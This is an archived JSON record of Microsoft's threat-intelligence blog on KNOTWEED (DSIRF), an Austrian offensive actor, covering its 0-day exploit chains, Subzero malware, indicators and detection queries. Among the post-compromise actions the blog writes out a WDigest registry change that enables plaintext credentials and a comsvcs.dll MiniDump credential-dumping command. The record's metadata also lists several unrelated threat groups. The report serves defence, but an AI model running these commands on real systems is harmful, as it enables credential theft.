{ "id": "2d8673da-ecbe-4e7c-b66c-f092d58c40b4", "created_at": "2026-04-06T00:07:03.649733Z", "updated_at": "2026-04-10T03:36:47.812851Z", "deleted_at": null, "sha1_hash": "a7943f166d2ba5893bf3884ab55187e40e5b28ca", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits | Microsoft Security Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1078485, "plain_text": "Untangling KNOTWEED: European private-sector offensive actor using\r\n0-day exploits | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2022-07-27 · Archived: 2026-04-05 12:47:28 UTC\r\nApril 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the\r\ntheme of weather. KNOTWEED is now tracked as Denim Tsunami.\r\nTo learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete\r\nmapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.\r\nThe Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched\r\nCVE-2022-22047, in limited and targeted attacks against European and Central American customers. The PSOA, which\r\nMSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\r\nThis blog details Microsoft’s analysis of the observed KNOTWEED activity and related malware used in targeted attacks\r\nagainst our customers. This information is shared with our customers and industry partners to improve detection of these\r\nattacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their\r\nsystems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have\r\nalso implemented detections against KNOTWEED’s malware and tools.\r\nPSOAs, which Microsoft also refers to as cyber mercenaries, sell hacking tools or services through a variety of business\r\nmodels. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the\r\nactor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any\r\ntargeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who\r\nthen runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may\r\nblend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\r\nWho is KNOTWEED?\r\nKNOTWEED is an Austria-based PSOA named DSIRF. The DSIRF website [web archive link] says they provide services\r\n“to multinational corporations in the technology, retail, energy and financial sectors” and that they have “a set of highly\r\nsophisticated techniques in gathering and analyzing information.” They publicly offer several services including “an\r\nenhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities” and\r\n“highly sophisticated Red Teams to challenge your company’s most critical assets.”\r\nHowever, multiple news reports have linked DSIRF to the development and attempted sale of a malware toolset called\r\nSubzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in\r\nWindows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft’s\r\ncommunications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and\r\nconfirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic\r\nconsultancies in countries such as Austria, the United Kingdom, and Panama. It’s important to note that the identification of\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 1 of 11\n\ntargets in a country doesn’t necessarily mean that a DSIRF customer resides in the same country, as international targeting is\r\ncommon.\r\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include\r\ncommand-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account\r\nbeing used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source\r\nnews reports attributing Subzero to DSIRF.\r\nObserved actor activity\r\nKNOTWEED initial access\r\nMSTIC found KNOTWEED’s Subzero malware deployed in a variety of ways. In the succeeding sections, the different\r\nstages of Subzero are referred to by their Microsoft Defender detection names: Jumplump for the persistent loader and\r\nCorelump for the main malware.\r\nKNOTWEED exploits in 2022\r\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation\r\nexploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF\r\ndocument that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of\r\nthe exploit chain, but the victim’s Adobe Reader version was released in January 2022, meaning that the exploit used was\r\neither a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED’s extensive use of\r\nother 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was\r\nanalyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there\r\nwere indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although\r\nwe’ve seen no evidence of browser-based attacks.\r\nThe CVE-2022-22047 vulnerability is related to an issue with activation context caching in the Client Server Run-Time\r\nSubsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly\r\nmanifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This\r\ncached context is used the next time the process spawned.\r\nCVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the\r\nability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit\r\nchain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-\r\n22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute\r\nthat specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious\r\nactivation context was used, the malicious DLL was loaded from the given path, and system-level code execution was\r\nachieved.\r\nIt’s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the\r\nthreat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker\r\ncannot control the path isn’t considered dangerous. Hence, these sandboxes aren’t a barrier to the exploitation of CVE-2022-\r\n22047.\r\nKNOTWEED exploits in 2021\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 2 of 11\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201)\r\nbeing used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021.\r\nMSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\r\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation\r\nvulnerability in the Windows Update Medic Service (CVE-2021-36948), which allowed an attacker to force the service to\r\nload an arbitrary signed DLL. The malicious DLL used in the attacks was signed by ‘DSIRF GmbH’.\r\nFigure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\r\nMalicious Excel documents\r\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file\r\nmasquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of\r\nbenign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\r\nFigure 2: Two examples of KNOTWEED Excel macro obfuscation\r\nAfter de-obfuscating strings at runtime, the VBA macro uses the ExecuteExcel4Macro function to call native Win32\r\nfunctions to load shellcode into memory allocated using VirtualAlloc. Each opcode is individually copied into a newly\r\nallocated buffer using memset before CreateThread is called to execute the shellcode.\r\nFigure 3: Copying opcodes\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 3 of 11\n\nFigure 4: Calling CreateThread on shellcode\r\nThe following section describes the shellcode executed by the macro.\r\nKNOTWEED malware and tactics, techniques, and procedures (TTPs)\r\nCorelump downloader and loader shellcode\r\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The\r\nshellcode’s purpose is to retrieve the Corelump second-stage malware from the actor’s command-and-control (C2) server.\r\nThe downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past\r\nthe 0xFF 0xD9 marker that signifies the end of a JPEG file). The JPEG is then written to the user’s %TEMP% directory.\r\nFigure 5: One of the images embedded with the loader shellcode and Corelump\r\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker,\r\nthe downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader\r\nshellcode RC4 decrypts the Corelump malware using a second RC4 key and manually loads it into memory.\r\nCorelump malware\r\nCorelump is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities\r\nincluding keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins\r\ndownloaded from KNOTWEED’s C2 server.\r\nAs part of installation, Corelump makes copies of legitimate Windows DLLs and overwrites sections of them with malicious\r\ncode. As part of this process, Corelump also modifies the fields in the PE header to accommodate the nefarious changes,\r\nsuch as adding new exported functions, disabling Control Flow Guard, and modifying the image file checksum with a\r\ncomputed value from CheckSumMappedFile. These trojanized binaries (Jumplump) are dropped to disk in\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 4 of 11\n\nC:\\Windows\\System32\\spool\\drivers\\color\\, and COM registry keys are modified for persistence (see the Behaviors section\r\nfor more information on COM hijacking).\r\nJumplump loader\r\nJumplump is responsible for loading Corelump into memory from the JPEG file in the %TEMP% directory. If Corelump is\r\nnot present, Jumplump attempts to download it again from the C2 server. Both Jumplump and the downloader shellcode are\r\nheavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp\r\ncombination, giving a convoluted control flow throughout the program.\r\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\r\nMex and PassLib\r\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by\r\nKNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line\r\ntool containing several red teaming or security plugins copied from GitHub (listed below):\r\nChisel mimikatz SharpHound3\r\nCurl Ping Castle SharpOxidResolver\r\nGrouper2 Rubeus PharpPrinter\r\nInternal Monologue SCShell SpoolSample\r\nInveigh Seatbelt StandIn\r\nLockless SharpExec  \r\nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers,\r\nemail clients, LSASS, LSA secrets, and the Windows credential manager.\r\nPost-compromise actions\r\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\r\nSetting of UseLogonCredential to “1” to enable plaintext credentials:\r\nreg  add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t\r\nREG_DWORD /d 1 /f\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 5 of 11\n\nCredential dumping via comsvcs.dll:\r\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump\r\nAttempt to access emails with dumped credentials from a KNOTWEED IP address\r\nUsing Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com\r\nRunning PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF\r\nKNOTWEED infrastructure connections to DSIRF\r\nPivoting off a known command-and-control domain identified by MSTIC, acrobatrelay[.]com, RiskIQ expanded the view of\r\nKNOTWEED’s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network\r\nfingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under\r\nthe control of KNOTWEED.  This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving\r\nmalware since at least February of 2020 and continues through the time of this writing.\r\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious.\r\nThis process yielded several domains with direct links to DSIRF, including demo3[.]dsirf[.]eu (the company’s own website),\r\nand several subdomains that appear to have been used for malware development, including debugmex[.]dsirflabs[.]eu\r\n(likely a server used for debugging malware with the bespoke utility tool Mex) and szstaging[.]dsirflabs[.]eu (likely a server\r\nused to stage Subzero malware).\r\nDetection and prevention\r\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current\r\ndetections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional\r\nadvanced hunting queries are also provided below to help organizations extend their protections and investigations of these\r\nattacks.\r\nBehaviors\r\nCorelump drops the Jumplump loader DLLs to C:\\Windows\\System32\\spool\\drivers\\color\\. This is a common directory used\r\nby malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\r\nJumplump uses COM hijacking for persistence, modifying COM registry keys to point to the Jumplump DLL in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\. Modifications of default system CLSID values should be monitored to detect\r\nthis technique (e.g., HKLM\\SOFTWARE\\Classes\\CLSID\\{GUID}\\InProcServer32 Default value). The five CLSIDs used by\r\nJumplump are listed below with their original clean values on Windows 11:\r\n{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = “%SystemRoot%\\System32\\ApplicationFrame.dll“\r\n{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = “%SystemRoot%\\system32\\propsys.dll“\r\n{4590f811-1d3a-11d0-891f-00aa004b2e24} = “%SystemRoot%\\system32\\wbem\\wbemprox.dll“\r\n{4de225bf-cf59-4cfc-85f7-68b90f185355} = “%SystemRoot%\\system32\\wbem\\wmiprvsd.dll“\r\n{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = “%SystemRoot%\\System32\\Actioncenter.dll“\r\nMany of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible\r\nmalicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry\r\nkeys such as HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, and LSASS credential dumping via\r\nminidumps.\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 6 of 11\n\nRecommended customer actions\r\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the\r\nsecurity considerations provided below:\r\nAll customers should prioritize patching of CVE-2022-22047.\r\nConfirm that Microsoft Defender Antivirus is updated to security intelligence update 1.371.503.0 or later to detect the\r\nrelated indicators.\r\nUse the included indicators of compromise to investigate whether they exist in your environment and assess for\r\npotential intrusion.\r\nChange Excel macro security settings to control which macros run and under what circumstances when you open a\r\nworkbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by\r\nAntimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for\r\nMacro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.\r\nEnable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is\r\nenforced for all remote connectivity. Note: Microsoft strongly encourages all customers download and use password-less solutions like Microsoft Authenticator to secure accounts.\r\nReview all authentication activity for remote access infrastructure, with a particular focus on accounts configured\r\nwith single factor authentication, to confirm authenticity and investigate any anomalous activity.\r\nIndicators of compromise (IOCs)\r\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these\r\nindicators in their environments and implement detections and protections to identify past related activity and prevent future\r\nattacks against their systems. All sample hashes are available in VirusTotal.\r\nIndicator Type Description\r\n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629\r\nSHA-256\r\nMalicious\r\nExcel\r\ndocument\r\nand VBA\r\n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f\r\nSHA-256\r\nMalicious\r\nExcel\r\ndocument\r\nand VBA\r\n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964\r\nSHA-256Jumplump\r\nmalware\r\ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b\r\nSHA-256Jumplump\r\nmalware\r\nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc\r\nSHA-256Jumplump\r\nmalware\r\n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206\r\nSHA-256Jumplump\r\nmalware\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 7 of 11\n\nIndicator Type Description\r\n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc\r\nSHA-256Jumplump\r\nmalware\r\n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d\r\nSHA-256Jumplump\r\nmalware\r\n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d\r\nSHA-256Jumplump\r\nmalware\r\nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec\r\nSHA-256Jumplump\r\nmalware\r\n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53\r\nSHA-256Jumplump\r\nmalware\r\n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431\r\nSHA-256Jumplump\r\nmalware\r\nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d\r\nSHA-256Corelump\r\nmalware\r\nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca\r\nSHA-256\r\nMex tool\r\ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6\r\nSHA-256\r\nPasslib tool\r\nacrobatrelay[.]com Domain C2\r\nfinconsult[.]cc Domain C2\r\nrealmetaldns[.]com Domain C2\r\nNOTE: These indicators should not be considered exhaustive for this observed activity.\r\nDetections\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build\r\n 1.371.503.0 as the following family names:\r\nBackdoor:O97M/JumplumpDropper\r\nTrojan:Win32/Jumplump\r\nTrojan:Win32/Corelump\r\nHackTool:Win32/Mexlib\r\nTrojan:Win32/Medcerc\r\nBehavior:Win32/SuspModuleLoad\r\nMicrosoft Defender for Endpoint\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 8 of 11\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts\r\nare not necessarily an indication of KNOTWEED compromise:\r\nCOM Hijacking – Detects multiple behaviors, including JumpLump malware persistence techniques.\r\nPossible privilege escalation using CTF module – Detects a possible privilege escalation behavior associated with\r\nCVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and\r\nloading an untrusted module to perform malicious activities\r\nKNOTWEED actor activity detected – Detects KNOTWEED actor activities\r\nWDigest configuration change – Detects potential retrieval of clear text password from changes to\r\nUseLogonCredential registry key\r\nSensitive credential memory read – Detects LSASS credential dumping via minidumps\r\nSuspicious Curl behavior – Detects the use of Curl to download KNOTWEED tooling from public file shares\r\nSuspicious screen capture activity – Detects Corelump behavior of capturing screenshots of the compromised system\r\nHunting queries\r\nMicrosoft Sentinel\r\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\r\nMicrosoft Defender Antivirus detections related to KNOTWEED\r\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml\r\nFile hash IOCs related to KNOTWEED\r\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel\r\ndata sets:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml\r\nDomain IOCs related to KNOTWEED\r\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel\r\ndata sets:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml\r\nCOM registry key modified to point to Color Profile folder\r\nThis query identifies modifications to COM registry keys to point to executable files in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml\r\nPE file dropped in Color Profile folder\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 9 of 11\n\nThis query looks for PE files being created in the C:\\Windows\\System32\\spool\\drivers\\color\\ folder:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml\r\nAbnormally large JPEG downloaded from new source\r\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a\r\ncommon source:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml\r\nDownloading new file using Curl\r\nThis query looks for new files being downloaded using Curl.\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml\r\nSuspected credential dumping\r\nThis query looks for attackers using comsvcs.dll to dump credentials from memory\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml\r\nDowngrade to plaintext credentials\r\nThis query looks for registry key being set to enabled plain text credentials\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml\r\nMicrosoft 365 Defender advanced hunting\r\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious\r\nactivity in their environments.\r\nMicrosoft Defender Antivirus detections related to KNOTWEED\r\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml\r\nFile hash IOCs related to KNOTWEED\r\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml\r\nDomain IOCs related to KNOTWEED\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 10 of 11\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint\r\ndevice network connections:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml\r\nCOM registry key modified to point to Color Profile folder\r\nThis query identifies modifications to COM registry keys to point to executable files in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml\r\nPE file dropped in Color Profile folder\r\nThis query looks for PE files being created in the C:\\Windows\\System32\\spool\\drivers\\color\\ folder:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml\r\nDownloading new file using Curl\r\nThis query looks for new files being downloaded using Curl.\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml\r\nSource: https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/" ], "report_names": [ "untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8e3cc644-b09e-4ed2-bdf8-b836e4f21319", "created_at": "2024-02-02T02:00:04.014083Z", "updated_at": "2026-04-10T02:00:03.523727Z", "deleted_at": null, "main_name": "Denim Tsunami", "aliases": [ "DSIRF" ], "source_name": "MISPGALAXY:Denim Tsunami", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1a76ed30-4daf-4817-98ae-87c667364464", "created_at": "2022-10-25T16:47:55.891029Z", "updated_at": "2026-04-10T02:00:03.646466Z", "deleted_at": null, "main_name": "IRON LIBERTY", "aliases": [ "ALLANITE ", "ATK6 ", "BROMINE ", "CASTLE ", "Crouching Yeti ", "DYMALLOY ", "Dragonfly ", "Energetic Bear / Berserk Bear ", "Ghost Blizzard ", "TEMP.Isotope ", "TG-4192 " ], "source_name": "Secureworks:IRON LIBERTY", "tools": [ "ClientX", "Ddex Loader", "Havex", "Karagany", "Loek", "MCMD", "Sysmain", "xfrost" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434023, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a7943f166d2ba5893bf3884ab55187e40e5b28ca.pdf", "text": "https://archive.orkl.eu/a7943f166d2ba5893bf3884ab55187e40e5b28ca.txt", "img": "https://archive.orkl.eu/a7943f166d2ba5893bf3884ab55187e40e5b28ca.jpg" } }